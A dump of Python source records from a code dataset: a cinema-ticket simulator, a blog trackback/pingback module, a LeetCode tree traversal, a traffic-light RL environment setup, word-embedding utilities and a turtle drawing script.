iptocc.convert_ip_string(ipv4String)\r\n self.assertEqual(isinstance(ipv4Object, ipaddress.IPv4Address), True)\r\n\r\n # Testing an invalid ip parameter\r\n with self.assertRaises(ValueError):\r\n invalidParam = 123456\r\n invalidObject = iptocc.convert_ip_string(invalidParam)\r\n \r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"test/test_search_database.py","file_name":"test_search_database.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"446036014","text":"films = {\n # key:[min age, # of tickets]\n \"Harry Potter\": [15, 10],\n \"Guardians\": [14, 0],\n \"Bourne\": [18, 5],\n \"Her\": [12, 1],\n \"Please Like Me\": [14, 5],\n \"The Tropical Adventures Of Penguini\": [21, 100]\n}\n\nwhile True:\n # title to capitalise the first letter of each word\n choice = input(\"What film do you want to watch? :\").strip().title()\n if choice in films:\n age = int(input(\"How old are you?: \").strip())\n # Check user age\n if age >= films[choice][0]:\n # Check number of seats\n\n num_seats = films[choice][1]\n\n if num_seats > 0:\n print(\"Enjoy the film!\")\n films[choice][1] = films[choice][1] - 1\n else:\n print(\"The tickets for this movie are sold out :(\")\n else:\n print(\"You are too young to watch that film :(\")\n else:\n print(\"We don't have that film...\")\n","sub_path":"Python_basics/Playground/Cinema Simulator.py","file_name":"Cinema Simulator.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"324124078","text":"from zoundry.base.net.http import ZSimpleTextHTTPRequest\r\nfrom zoundry.base.util.text.textutil import getNoneString\r\nfrom zoundry.base.util.text.textutil import getSafeString\r\nfrom zoundry.base.util.text.unicodeutil import convertToUtf8\r\nfrom zoundry.base.util.types.attrmodel import ZModelWithAttributes\r\nfrom zoundry.base.xhtml.xhtmlutil import extractTitle\r\nimport re\r\n\r\n#===================================================\r\n# Module for sending trackbacks\r\n#===================================================\r\nRDF_NS = u\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" #$NON-NLS-1$\r\nDC_ELEMENTS_NS = u\"http://purl.org/dc/elements/1.1/\" #$NON-NLS-1$\r\n\r\n# Begin RDF regular expressions\r\nRDF_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nRDF_RE = re.compile(RDF_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nRDF_ABOUT_PATTERN = r'.*rdf:about\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nRDF_ABOUT_RE = re.compile(RDF_ABOUT_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nDC_ID_PATTERN = r'.*dc:identifier\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nDC_ID_RE = re.compile(DC_ID_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nDC_TITLE_PATTERN = r'.*dc:title\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nDC_TITLE_RE = re.compile(DC_TITLE_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nTB_PING_PATTERN = r'.*trackback:ping\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nTB_PING_RE = re.compile(TB_PING_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nDC_DESC_PATTERN = r'.*dc:description\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nDC_DESC_RE = re.compile(DC_DESC_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nDC_DATE_PATTERN = r'.*dc:date\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nDC_DATE_RE = re.compile(DC_DATE_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nDC_CREATOR_PATTERN = r'.*dc:creator\\s*=\\s*\\\"(.*?)\\\"' #$NON-NLS-1$\r\nDC_CREATOR_RE = re.compile(DC_CREATOR_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\n# End RDF regular expressions\r\n\r\n# RSS Item regular expressions\r\nITEM_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nITEM_RE = re.compile(ITEM_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\n\r\nITEM_LINK_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nITEM_LINK_RE = re.compile(ITEM_LINK_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nITEM_DESC_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nITEM_DESC_RE = re.compile(ITEM_DESC_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\n# RSS 1.0\r\nITEM_TB_1_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nITEM_TB_2_RE = re.compile(ITEM_TB_2_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\n# End RSS Item regular expressions\r\n\r\n# Trackback ping response\r\nTB_RESP_ERROR_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nTB_RESP_ERROR_RE = re.compile(TB_RESP_ERROR_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nTB_RESP_MSG_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nTB_RESP_MSG_RE = re.compile(TB_RESP_MSG_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\nTB_RESP_TITLE_PATTERN = r']*?>(.*?)]*?>' #$NON-NLS-1$\r\nTB_RESP_TITLE_RE = re.compile(TB_RESP_TITLE_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL)\r\n\r\n# ping back\r\nPB_LINK_TAG_PATTERN = u'()' #$NON-NLS-1$\r\nPB_LINK_TAG_RE = re.compile(PB_LINK_TAG_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE)\r\nPB_HREF_PATTERN = u'(.*href\\s*=\\s*\"?)([^\"^\\s]*)([\"\\s].*>)(.*)' #$NON-NLS-1$\r\nPB_HREF_RE = re.compile(PB_HREF_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE)\r\n\r\n#----------------------------------------------\r\n# Blog post entry trackback meta data\r\n#--------------------------------------------------------------\r\nclass ZTrackbackEntry(ZModelWithAttributes):\r\n\r\n def __init__(self, pingUrl, entryUrl, title, summary):\r\n ZModelWithAttributes.__init__(self)\r\n self.setAttribute(u\"ping\", pingUrl) #$NON-NLS-1$\r\n self.setAttribute(u\"url\", entryUrl) #$NON-NLS-1$\r\n self.setAttribute(u\"title\", title) #$NON-NLS-1$\r\n self.setAttribute(u\"summary\", summary) #$NON-NLS-1$\r\n # end __init__\r\n\r\n def getPingUrl(self):\r\n u\"\"\"\r\n getPingUrl() -> string\r\n Returns trackback ping URL.\r\n \"\"\" #$NON-NLS-1$\r\n return self.getAttribute(u\"ping\") #$NON-NLS-1$\r\n # end getPingUrl()\r\n\r\n def getEntryUrl(self):\r\n u\"\"\"\r\n getEntryUrl() -> string\r\n Returns blog post entry URL.\r\n \"\"\" #$NON-NLS-1$\r\n return self.getAttribute(u\"url\") #$NON-NLS-1$\r\n # end getEntryUrl()\r\n\r\n def getTitle(self):\r\n u\"\"\"\r\n getTitle() -> string\r\n Returns title of post.\r\n \"\"\" #$NON-NLS-1$\r\n return getSafeString(self.getAttribute(u\"title\")) #$NON-NLS-1$\r\n # end getTitle()\r\n\r\n def getSummary(self):\r\n u\"\"\"\r\n getSummary() -> string\r\n Returns the optional summary or description.\r\n \"\"\" #$NON-NLS-1$\r\n return getSafeString(self.getAttribute(u\"summary\")) #$NON-NLS-1$\r\n # end getSummary()\r\n\r\n# end ZTrackbackEntry\r\n\r\n#----------------------------------------------\r\n# Auto discover result\r\n#--------------------------------------------------------------\r\nclass ZTrackbackDiscoverResult:\r\n\r\n def __init__(self, title, entries):\r\n self. title = title\r\n self.entries = entries\r\n # end __init__()\r\n\r\n def getTitle(self):\r\n u\"\"\"\r\n getTitle() -> string\r\n Returns html page title.\r\n \"\"\" #$NON-NLS-1$\r\n return self.title\r\n # end getTitle()\r\n\r\n def getTrackbackEntries(self):\r\n u\"\"\"\r\n getTrackbackEntries() -> list\r\n Returns list of ZTrackbackEntry items.\r\n \"\"\" #$NON-NLS-1$\r\n return self.entries\r\n # end getTrackbackEntries\r\n\r\n# end ZTrackbackDiscoverResult\r\n\r\n\r\n#---------------------------------------------\r\n# Class to auto discover trackback information\r\n#----------------------------------------------\r\nclass ZTrackbackDiscovery:\r\n u\"\"\"ZTrackbackDiscovery discovers trackback information given a site URL.\r\n The discovery is based on either RDF or RSS content in a page.\"\"\" #$NON-NLS-1$\r\n\r\n def discover(self, url):\r\n u\"\"\"discover(string) -> list of IZTrackbackEntry\r\n Retrieves the contents of the given url and discovers (extracts) the trackback\r\n information from either the RDF of RSS Item constructs. This method returns a list\r\n of IZTrackbackEntry objects for each trackback discovered.\"\"\" #$NON-NLS-1$\r\n\r\n trackbackEntryList = []\r\n htmlContent = self._downloadHtmlContent(url)\r\n title = u\"\" #$NON-NLS-1$\r\n if htmlContent:\r\n title = extractTitle(htmlContent)\r\n trackbackEntryList = self._parseContent(url, title, htmlContent)\r\n rval = ZTrackbackDiscoverResult(title, trackbackEntryList)\r\n return rval\r\n # end discover()\r\n\r\n def _parseContent(self, url, title, htmlContent):\r\n trackbackEntryList = []\r\n trackbackEntryList.extend( self._extractRdf(url, title, htmlContent) )\r\n trackbackEntryList.extend( self._extractRssItems(url, title, htmlContent) )\r\n trackbackEntryList.extend( self._extractMsnContent(url, title, htmlContent) )\r\n return trackbackEntryList\r\n # end _parseContent()\r\n\r\n def _extractRdf(self, url, title, htmlContent): #@UnusedVariable\r\n rdfTbList = []\r\n rdfEleList = RDF_RE.findall(htmlContent)\r\n for rdf in rdfEleList:\r\n #rdfAbout = self._extract(RDF_ABOUT_RE,rdf)\r\n rdfId = self._extract(DC_ID_RE,rdf)\r\n rdfTitle = self._extract(DC_TITLE_RE,rdf)\r\n pingUrl = self._extract(TB_PING_RE,rdf)\r\n rdfDesc = self._extract(DC_DESC_RE,rdf)\r\n rdfDate = self._extract(DC_DATE_RE,rdf)\r\n rdfCreator = self._extract(DC_CREATOR_RE,rdf)\r\n if rdfDesc:\r\n temp = rdfDesc.lower()\r\n if temp.startswith(u\" ZTrackbackPingResponse\r\n Pings the track back and returns ZTrackbackPingResponse\"\"\" #$NON-NLS-1$\r\n if getNoneString(pingUrl) is None:\r\n return ZTrackbackPingResponse(False, u\"Trackback ping url is required.\") #$NON-NLS-1$\r\n\r\n if getNoneString(id) is None:\r\n return ZTrackbackPingResponse(False, u\"Trackback Originating Resource ID is required.\") #$NON-NLS-1$\r\n\r\n if getNoneString(url) is None:\r\n return ZTrackbackPingResponse(False, u\"Trackback post url is required.\") #$NON-NLS-1$\r\n\r\n title = convertToUtf8( getSafeString(title) )\r\n blogName = convertToUtf8( getSafeString(blogName))\r\n excerpt = convertToUtf8( getSafeString(excerpt))\r\n\r\n postData = {\r\n u'id': id, #$NON-NLS-1$\r\n u'url': url, #$NON-NLS-1$\r\n u'title': title, #$NON-NLS-1$\r\n u'blog_name': blogName, #$NON-NLS-1$\r\n u'excerpt': excerpt #$NON-NLS-1$\r\n }\r\n\r\n htmlResult = self._sendHttpPostData(pingUrl, postData)\r\n resp = self._parseResponse(htmlResult)\r\n return resp\r\n # end ping\r\n\r\n def _sendHttpPostData(self, pingUrl, postDataMap):\r\n try:\r\n request = ZSimpleTextHTTPRequest(pingUrl)\r\n if request.send(postDataMap):\r\n return request.getResponse()\r\n except:\r\n pass\r\n return None\r\n # end _sendHttpPostData()\r\n\r\n\r\n def _parseResponse(self, htmlResult):\r\n u\"\"\"Parses the trackback response data and returns ZTrackbackPingResponse.\"\"\" #$NON-NLS-1$\r\n if not htmlResult:\r\n return ZTrackbackPingResponse(False, u\"Trackback HTTP POST empty response error.\") #$NON-NLS-1$\r\n bOk = False\r\n msg = u\"OK\" #$NON-NLS-1$\r\n fList = TB_RESP_ERROR_RE.findall(htmlResult)\r\n if fList and len(fList) > 0 and fList[0] and fList[0].strip() == u\"0\": #$NON-NLS-1$\r\n bOk = True\r\n elif fList and len(fList) > 0 and fList[0] and fList[0].strip() == u\"1\": #$NON-NLS-1$\r\n bOk = False\r\n else:\r\n msg = u\"Trackback element not found in response\" #$NON-NLS-1$\r\n fList = TB_RESP_TITLE_RE.findall(htmlResult)\r\n if fList and len(fList) > 0 and fList[0]:\r\n msg = u\"Trackback HTTP response error: %s\" % fList[0].strip() #$NON-NLS-1$\r\n return ZTrackbackPingResponse (False, msg)\r\n\r\n fList = TB_RESP_MSG_RE.findall(htmlResult)\r\n if fList and len(fList) > 0 and fList[0]:\r\n msg = fList[0].strip()\r\n elif not bOk:\r\n msg = u\"Trackback response message not available\" #$NON-NLS-1$\r\n\r\n return ZTrackbackPingResponse(bOk, msg)\r\n # end _parseResponse()\r\n\r\n# end ZTrackbackPinger()\r\n\r\n# FIXME PJ Support following trackback formats:\r\n# http://www.lifewiki.net/attachments/view/101/2.2\r\n#\r\n# Example HTML TrackBack Link\r\n#\r\n# \r\n\r\n# \r\n#\r\n# Example Atom TrackBack Link\r\n#\r\n# \r\n# ...\r\n# \r\n# ...\r\n# \r\n","sub_path":"src/python/zoundry/blogpub/trackback.py","file_name":"trackback.py","file_ext":"py","file_size_in_byte":15412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"238424773","text":"#\n# @lc app=leetcode.cn id=94 lang=python3\n#\n# [94] Binary Tree Inorder Traversal\n#\n# https://leetcode-cn.com/problems/binary-tree-inorder-traversal/description/\n#\n# algorithms\n# Medium (72.75%)\n# Total Accepted: 262.5K\n# Total Submissions: 357K\n# Testcase Example: '[1,null,2,3]'\n#\n# 给定一个二叉树,返回它的中序 遍历。\n# \n# 示例:\n# \n# 输入: [1,null,2,3]\n# ⁠ 1\n# ⁠ \\\n# ⁠ 2\n# ⁠ /\n# ⁠ 3\n# \n# 输出: [1,3,2]\n# \n# 进阶: 递归算法很简单,你可以通过迭代算法完成吗?\n# \n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\ndef inorder(root, result):\n if not root:\n return\n inorder(root.left, result)\n result.append(root.val)\n inorder(root.right, result)\n\nclass Solution:\n def inorderTraversal(self, root: TreeNode) -> List[int]:\n result = []\n inorder(root, result)\n return result\n","sub_path":"Week_02/94.binary-tree-inorder-traversal.py","file_name":"94.binary-tree-inorder-traversal.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"432557033","text":"from ray.rllib.agents.ppo.ppo_policy import PPOTFPolicy\nfrom flow.envs.multiagent import MultiTrafficLightGridPOEnv\nfrom flow.networks import TrafficLightGridNetwork\nfrom flow.core.params import SumoParams, EnvParams, InitialConfig, NetParams\nfrom flow.core.params import InitialConfig\nfrom flow.core.params import TrafficLightParams\n\nfrom flow.core.params import InFlows, SumoCarFollowingParams, VehicleParams\nfrom flow.controllers import SimCarFollowingController, GridRouter\nfrom ray.tune.registry import register_env\nfrom flow.utils.registry import make_create_env\n\n# the TestEnv environment is used to simply simulate the network\nfrom flow.envs import TestEnv\n# the Experiment class is used for running simulations\nfrom flow.core.experiment import Experiment\n# the base network class\nfrom flow.networks import Network\n# all other imports are standard\nfrom flow.core.params import VehicleParams, NetParams, InitialConfig, EnvParams, \\\n SumoParams, SumoCarFollowingParams, InFlows, SumoLaneChangeParams, TrafficLightParams\n#from flow.envs.ring.accel import AccelEnv, ADDITIONAL_ENV_PARAMS\nfrom tl_custom_env_ma import ADDITIONAL_ENV_PARAMS,MultiTrafficLightGridPOEnv\n\nfrom flow.controllers import SimLaneChangeController, GridRouter\n\n# define parameters\nfrom flow.controllers.rlcontroller import RLController\nfrom flow.controllers.lane_change_controllers import SimLaneChangeController\nfrom flow.controllers.routing_controllers import ContinuousRouter\nfrom copy import deepcopy\nfrom gym.spaces.box import Box\nfrom flow.core import rewards\nfrom flow.envs.base import Env\nfrom tl_net_ma import offRampGrid,initial_config,net_params\n\nimport logging\nimport datetime\nimport numpy as np\nimport time\nimport os\nfrom flow.core.util import emission_to_csv\nfrom flow.utils.registry import make_create_env\n\n# We firstly test on a single agent scenario\ndef para_produce_rl(HORIZON=3000):\n # Create default environment parameters\n env_params = EnvParams()\n\n # Vehicle definition\n vehicles = VehicleParams()\n num_vehicles = 1\n vehicles.add(\n veh_id=\"human\",\n routing_controller=(GridRouter, {}),\n lane_change_controller=(SimLaneChangeController, {}),\n car_following_params=SumoCarFollowingParams(\n min_gap=2.5,\n decel=7.5, # avoid collisions at emergency stops\n ),\n lane_change_params=SumoLaneChangeParams(\n lane_change_mode=1621,\n ),\n num_vehicles=num_vehicles)\n\n # whether to allow turns at intersections\n ALLOW_TURNS = False\n \n # initialize traffic lights, used when you want define your own traffic lights\n tl_logic = TrafficLightParams(baseline=False) # To see static traffic lights in action, the `TrafficLightParams` object should be instantiated with `baseline=False`\n\n # when use off_ramp_grid.net.xml file, you should use a phase state example as \"GGGgrrrrGGGgrrrr\"\n # when use off_ramp_grid_turn.net.xml file, you should use a phase state example as \"GGGggrrrrrGGGggrrrrr\"\n if ALLOW_TURNS:\n phases = [{\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n # for actuated traffic lights, you can add these optional values below\n # \"maxGap\": int, describes the maximum time gap between successive vehicle sthat will cause the current phase to be prolonged\n # \"detectorGap\": int, determines the time distance between the (automatically generated) detector and the stop line in seconds\n # \"showDetectors\": bool, toggles whether or not detectors are shown in sumo-gui\n \"state\": \"GGGggrrrrrGGGggrrrrr\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"yyyyyrrrrryyyyyrrrrr\"\n }, {\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n \"state\": \"rrrrrGGGggrrrrrGGGgg\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"rrrrryyyyyrrrrryyyyy\"\n }]\n tl_logic.add(\"center0\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n tl_logic.add(\"center1\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n tl_logic.add(\"center2\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n tl_logic.add(\"center3\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n else:\n phases = [{\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n # for actuated traffic lights, you can add these optional values below\n # \"maxGap\": int, describes the maximum time gap between successive vehicle sthat will cause the current phase to be prolonged\n # \"detectorGap\": int, determines the time distance between the (automatically generated) detector and the stop line in seconds\n # \"showDetectors\": bool, toggles whether or not detectors are shown in sumo-gui\n \"state\": \"GGGgrrrrGGGgrrrr\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"yyyyrrrryyyyrrrr\"\n }, {\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n \"state\": \"rrrrGGGgrrrrGGGg\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"rrrryyyyrrrryyyy\"\n }]\n\n # THIS IS A BUG THAT I DON'T KNOW WHY IT HAPPENS!!!!!!\n phase0 = [{\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n \"state\": \"GGrrGGrrGGrrGGrr\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"yyrryyrryyrryyrr\"\n }, {\n \"duration\": \"31\",\n \"minDur\": \"8\",\n \"maxDur\": \"45\",\n \"state\": \"rrGGrrGGrrGGrrGG\"\n }, {\n \"duration\": \"6\",\n \"minDur\": \"3\",\n \"maxDur\": \"6\",\n \"state\": \"rryyrryyrryyrryy\"\n }]\n\n tl_logic.add(\"center0\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n tl_logic.add(\"center1\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n tl_logic.add(\"center2\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n tl_logic.add(\"center3\", phases=phases, programID=1, detectorGap=1,tls_type=\"actuated\")\n \n flow_params = dict(\n exp_tag='offramp_multiagent_inflow_1.0_speed_20',\n env_name=MultiTrafficLightGridPOEnv,\n network=offRampGrid,\n simulator='traci',\n sim=SumoParams(\n sim_step=0.1,\n render=False,\n #emission_path='./data',\n restart_instance=True,\n ),\n env=EnvParams(\n horizon=3000, additional_params=ADDITIONAL_ENV_PARAMS.copy(),\n ),\n net=net_params,\n veh=vehicles,\n initial=initial_config,\n # used when you define your own traffic lights\n #tls=tl_logic,\n )\n #flow_params['env'].horizon = HORIZON\n return flow_params\n\nflow_params = para_produce_rl()\n\nclass Experiment:\n def __init__(self, flow_params=flow_params):\n \"\"\"Instantiate Experiment.\"\"\"\n # Get the env name and a creator for the environment.\n self.create_env, self.env_name = make_create_env(flow_params)\n\n # Create the environment.\n self.env = self.create_env()\n self.flow_params = flow_params\n\n # Register as rllib env\n register_env(self.env_name,self.create_env)\n\n self.obs_space = self.env.observation_space\n self.act_space = self.env.action_space\n\n logging.info(\" Starting experiment {} at {}\".format(\n self.env.network.name, str(datetime.datetime.utcnow())))\n\n logging.info(\"Initializing environment.\")\n\n","sub_path":"project_ma/tl_env_ma.py","file_name":"tl_env_ma.py","file_ext":"py","file_size_in_byte":7845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"156716829","text":"import math\n\nimport gensim\nimport matplotlib.pylab as plt\nimport numpy as np\nimport pandas as pd\nfrom six import string_types\nfrom sklearn.cluster import KMeans\nfrom sklearn.manifold import TSNE\nfrom sklearn.metrics import accuracy_score\n\n\nWORD_EMBEDDING_MODEL_TYPES = (gensim.models.keyedvectors.KeyedVectors,\n gensim.models.keyedvectors.BaseKeyedVectors,\n gensim.models.fasttext.FastText,\n gensim.models.word2vec.Word2Vec,\n gensim.models.base_any2vec.BaseWordEmbeddingsModel,) # pylint: disable=line-too-long\n\n\ndef round_to_extreme(value, digits=2):\n place = 10**digits\n new_value = math.ceil(abs(value) * place) / place\n if value < 0:\n new_value = -new_value\n return new_value\n\n\ndef normalize(v):\n \"\"\"Normalize a 1-D vector.\"\"\"\n if v.ndim != 1:\n raise ValueError('v should be 1-D, {}-D was given'.format(\n v.ndim))\n norm = np.linalg.norm(v)\n if norm == 0:\n return v\n return v / norm\n\n\ndef cosine_similarity(v, u):\n \"\"\"Calculate the cosine similarity between two vectors.\"\"\"\n v_norm = np.linalg.norm(v)\n u_norm = np.linalg.norm(u)\n similarity = v @ u / (v_norm * u_norm)\n return similarity\n\n\ndef project_vector(v, u):\n \"\"\"Projecting the vector v onto direction u.\"\"\"\n normalize_u = normalize(u)\n return (v @ normalize_u) * normalize_u\n\n\ndef reject_vector(v, u):\n \"\"\"Rejecting the vector v onto direction u.\"\"\"\n return v - project_vector(v, u)\n\n\ndef project_reject_vector(v, u):\n \"\"\"Projecting and rejecting the vector v onto direction u.\"\"\"\n projected_vector = project_vector(v, u)\n rejected_vector = v - projected_vector\n return projected_vector, rejected_vector\n\n\ndef project_params(u, v):\n \"\"\"Projecting and rejecting the vector v onto direction u with scalar.\"\"\"\n normalize_u = normalize(u)\n projection = (v @ normalize_u)\n projected_vector = projection * normalize_u\n rejected_vector = v - projected_vector\n return projection, projected_vector, rejected_vector\n\n\ndef cosine_similarities_by_words(model, word, words):\n \"\"\"Compute cosine similarities between a word and a set of other words.\"\"\"\n\n assert isinstance(word, string_types), \\\n 'The arguemnt `word` should be a string.'\n assert not isinstance(words, string_types), \\\n 'The argument `words` should not be a string.'\n\n vec = model[word]\n vecs = [model[w] for w in words]\n return model.cosine_similarities(vec, vecs)\n\n\ndef update_word_vector(model, word, new_vector):\n model.vectors[model.vocab[word].index] = new_vector\n if model.vectors_norm is not None:\n model.vectors_norm[model.vocab[word].index] = normalize(new_vector)\n\n\ndef generate_one_word_forms(word):\n return [word.lower(), word.upper(), word.title()]\n\n\ndef generate_words_forms(words):\n return sum([generate_one_word_forms(word) for word in words], [])\n\n\ndef take_two_sides_extreme_sorted(df, n_extreme,\n part_column=None,\n head_value='',\n tail_value=''):\n head_df = df.head(n_extreme)[:]\n tail_df = df.tail(n_extreme)[:]\n\n if part_column is not None:\n head_df[part_column] = head_value\n tail_df[part_column] = tail_value\n\n return (pd.concat([head_df, tail_df])\n .drop_duplicates()\n .reset_index(drop=True))\n\n\ndef assert_gensim_keyed_vectors(model):\n if not isinstance(model, WORD_EMBEDDING_MODEL_TYPES):\n type_names = (model_type.__name__\n for model_type in WORD_EMBEDDING_MODEL_TYPES)\n raise TypeError('model should be on of the types'\n ' ({}), not {}.'\n .format(', '.join(type_names),\n type(model)))\n\n\ndef most_similar(model, positive=None, negative=None,\n topn=10, restrict_vocab=None, indexer=None,\n unrestricted=True):\n \"\"\"\n Find the top-N most similar words.\n\n Positive words contribute positively towards the similarity,\n negative words negatively.\n\n This function computes cosine similarity between a simple mean\n of the projection weight vectors of the given words and\n the vectors for each word in the model.\n The function corresponds to the `word-analogy` and `distance`\n scripts in the original word2vec implementation.\n\n Based on Gensim implementation.\n\n :param model: Word embedding model of ``gensim.model.KeyedVectors``.\n :param list positive: List of words that contribute positively.\n :param list negative: List of words that contribute negatively.\n :param int topn: Number of top-N similar words to return.\n :param int restrict_vocab: Optional integer which limits the\n range of vectors\n which are searched for most-similar values.\n For example, restrict_vocab=10000 would\n only check the first 10000 word vectors\n in the vocabulary order. (This may be\n meaningful if you've sorted the vocabulary\n by descending frequency.)\n :param bool unrestricted: Whether to restricted the most\n similar words to be not from\n the positive or negative word list.\n :return: Sequence of (word, similarity).\n \"\"\"\n if topn is not None and topn < 1:\n return []\n\n if positive is None:\n positive = []\n if negative is None:\n negative = []\n\n model.init_sims()\n\n if (isinstance(positive, string_types)\n and not negative):\n # allow calls like most_similar('dog'),\n # as a shorthand for most_similar(['dog'])\n positive = [positive]\n\n if ((isinstance(positive, string_types) and negative)\n or (isinstance(negative, string_types) and positive)):\n raise ValueError('If positives and negatives are given, '\n 'both should be lists!')\n\n # add weights for each word, if not already present;\n # default to 1.0 for positive and -1.0 for negative words\n positive = [\n (word, 1.0) if isinstance(word, string_types + (np.ndarray,))\n else word\n for word in positive\n ]\n negative = [\n (word, -1.0) if isinstance(word, string_types + (np.ndarray,))\n else word\n for word in negative\n ]\n\n # compute the weighted average of all words\n all_words, mean = set(), []\n for word, weight in positive + negative:\n if isinstance(word, np.ndarray):\n mean.append(weight * word)\n else:\n mean.append(weight * model.word_vec(word, use_norm=True))\n if word in model.vocab:\n all_words.add(model.vocab[word].index)\n\n if not mean:\n raise ValueError(\"Cannot compute similarity with no input.\")\n mean = gensim.matutils.unitvec(np.array(mean)\n .mean(axis=0)).astype(float)\n\n if indexer is not None:\n return indexer.most_similar(mean, topn)\n\n limited = (model.vectors_norm if restrict_vocab is None\n else model.vectors_norm[:restrict_vocab])\n dists = limited @ mean\n\n if topn is None:\n return dists\n\n best = gensim.matutils.argsort(dists,\n topn=topn + len(all_words),\n reverse=True)\n\n # if not unrestricted, then ignore (don't return)\n # words from the input\n result = [(model.index2word[sim], float(dists[sim]))\n for sim in best\n if unrestricted or sim not in all_words]\n\n return result[:topn]\n\n\ndef get_seed_vector(seed, bias_word_embedding):\n\n if seed == 'direction':\n positive_end = bias_word_embedding.positive_end\n negative_end = bias_word_embedding.negative_end\n bias_word_embedding._is_direction_identified() # pylint: disable=protected-access\n seed_vector = bias_word_embedding.direction\n else:\n if seed == 'ends':\n positive_end = bias_word_embedding.positive_end\n negative_end = bias_word_embedding.negative_end\n\n else:\n positive_end, negative_end = seed\n\n seed_vector = normalize(bias_word_embedding.model[positive_end]\n - bias_word_embedding.model[negative_end])\n\n return seed_vector, positive_end, negative_end\n\n\ndef plot_clustering_as_classification(X, y_true, random_state=1, ax=None):\n\n if ax is None:\n _, ax = plt.subplots(figsize=(10, 5))\n\n y_cluster = (KMeans(n_clusters=2, random_state=random_state)\n .fit_predict(X))\n\n embedded_vectors = (TSNE(n_components=2, random_state=random_state)\n .fit_transform(X))\n\n for y_value in np.unique(y_cluster):\n mask = (y_cluster == y_value)\n label = 'Positive' if y_value else 'Negative'\n ax.scatter(embedded_vectors[mask, 0],\n embedded_vectors[mask, 1],\n label=label)\n\n ax.legend()\n\n acc = accuracy_score(y_true, y_cluster)\n\n return max(acc, 1 - acc)\n","sub_path":"responsibly/we/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"522510861","text":"import turtle\r\n\r\nturtle.shape('turtle')\r\nturtle.speed(10)\r\ndef circle(x):\r\n for i in range(40):\r\n\r\n turtle.forward(4)\r\n turtle.left(360/40)\r\n\r\n\r\nfor k in range (1,7):\r\n circle(k)\r\n turtle.setheading(360*k / 